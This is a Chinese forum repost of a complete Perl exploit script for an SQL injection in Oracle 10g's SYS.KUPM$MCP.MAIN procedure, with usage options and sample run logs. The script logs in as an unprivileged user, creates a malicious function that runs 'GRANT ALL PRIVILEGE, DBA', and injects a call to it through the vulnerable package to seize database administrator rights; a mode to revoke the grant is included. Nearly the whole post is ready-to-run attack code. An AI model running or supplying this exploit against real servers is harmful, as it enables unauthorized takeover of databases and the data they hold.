• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

    发布者: 土豆服务器 | 发布时间: 2025-6-28 22:51| 查看数: 57| 评论数: 0|帖子模式

    #!/usr/bin/perl
    #
    # Remote Oracle KUPM$MCP.MAIN exploit (10g)
    #
    # Grant or revoke dba permission to unprivileged user
    #
    # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
    #
    #   REF:    http://www.red-database-security.com/
    #   
    #   AUTHOR: Andrea "bunker" Purificato
    #           http://rawlab.mindcreations.com
    #
    #   DATE:   Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007
    #
    # Oracle InstantClient (basic   sdk) required for DBD::Oracle
    #
    # bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
    #  [-] Wait...
    #  [-] Revoking DBA from BUNKER...
    #  DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.
    #  [-] Done!
    #
    # bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g
    #  [-] Wait...
    #  [-] Creating evil function...
    #  [-] Go ...(don't worry about errors)!
    #  DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
    #  ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
    #  BEGIN
    #   SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');
    #  END;"] at kupm-mcpmain.pl line 119.
    #  [-] YOU GOT THE POWAH!!
    #
    # bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
    #  [-] Wait...
    #  [-] Revoking DBA from BUNKER...
    #  [-] Done!
    #

    use warnings;
    use strict;
    use DBI;
    use Getopt::Std;
    use vars qw/ %opt /;

    sub usage {
        print <<"USAGE";
         
    Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

    Options:
         -h     <host>     target server address
         -s     <sid>      target sid name
         -u     <user>     user
         -p     <passwd>   password

         -g|-r             (g)rant dba to user | (r)evoke dba from user
        [-P     <port>     Oracle port]

    USAGE
        exit 0
    }

    my $opt_string = 'h:s:u:p:grP:';
    getopts($opt_string, \%opt) or &usage;
    &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
    &usage if ( !$opt{g} and !$opt{r} );
    my $user = uc $opt{u};

    my $dbh = undef;
    if ($opt{P}) {
        $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
    } else {
        $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
    }

    my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
    print "[-] Wait...\n";

    if ($opt{r}) {
        print "[-] Revoking DBA from $user...\n";
        $sqlcmd = "REVOKE DBA FROM $user";
        $dbh->do( $sqlcmd );
        print "[-] Done!\n";
        $dbh->disconnect;
        exit;
    }

    print "[-] Creating evil function...\n";
    $dbh->do( qq{
    CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
    AUTHID CURRENT_USER AS
    PRAGMA AUTONOMOUS_TRANSACTION;
    BEGIN
    EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
    RETURN(0);
    END;
    } );

    print "[-] Go ...(don't worry about errors)!\n";
    my $sth = $dbh->prepare( qq{
    BEGIN
    SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--','');
    END;});
    $sth->execute;
    $sth->finish;
    print "[-] YOU GOT THE POWAH!!\n";
    $dbh->disconnect;
    exit;

    来源:https://www.jb51.net/hack/5698.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表